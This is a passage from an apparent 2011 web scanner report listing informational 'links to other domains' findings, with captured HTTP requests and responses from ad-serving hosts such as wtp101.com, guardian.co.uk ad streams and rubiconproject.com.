Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1239357571?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1239357571?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

19.154. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscvhQXm1RSwi_skszjsFtTxBnAoxa_C0A HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600740; pvmap=!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:30:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M#,1317601852; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317601852,ova3!3919,1317601775,ova3!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1505999587?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1505999587?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

19.155. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1654066132?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1654066132?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

19.156. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4?k=championsleague&k=sport&k=football&k=basel&k=champions-league-2011-12&k=manchester-united&cf=live&pid=&ct=article&pt=article& HTTP/1.1
Host: oas.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; NSC_hvbsejbo-efm_qppm_iuuq=ffffffff0909d78045525d5f4f58455e445a4a423660; member_type=0; GU_ST=; rsi_segs=; s_pers=%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20s_lv%3D1317599870523%7C1412207870523%3B%20s_lv_s%3DFirst%2520Visit%7C1317601670523%3B%20s_visit%3D1%7C1317601670535%3B%20c_dl%3D1%7C1317601670538%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601670544%3B%20s_nr%3D1317599870547-New%7C1349135870547%3B; s_sess=%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_ppv%3D27%3B%20s_sq%3Dguardiangu-football%252Cguardiangu-network%253D%252526pid%25253DManchester%25252520United%2525253AKeyword%25252520Page%2525253A589863%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.guardian.co.uk%2525252Ffootball%2525252F2011%2525252Fsep%2525252F27%2525252Fmanchester-united-basel-live%252526ot%25253DA%3B%20s_cc%3Dtrue%3B

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7470
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Middle2') {
document.write ('\n');
document.write ('<!-- Rubicon Project Tag -->\n');
document.write ('<!-- Site: guardian.co.uk (US) Zone: Sports BTF MPU Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'Position4') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Leaderboard -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'x31') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...

19.157. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4?k=manchester-united&cf=premier+league&pid=&ct=&pt=keyword& HTTP/1.1
Host: oas.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_sess=%20s_cc%3Dtrue%3B

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 5814
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Position4') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Medium Rectangle -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="300" HEIGHT="250"></IFRAME>
...[SNIP]...
<!-- Site: guardian.co.uk (US) Zone: Sports Size: Leaderboard -->\n');
document.write ('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...
</SCRIPT>\n');
document.write (' \n');
document.write (' ');
}
if (position == 'x31') {
document.write ('<IMG SRC="http://imageceu1.247realmedia.com/0/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0">\n');
document.write (' \n');
document.write (' <SCRIPT language="JavaScript1.1">
...[SNIP]...

19.158. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
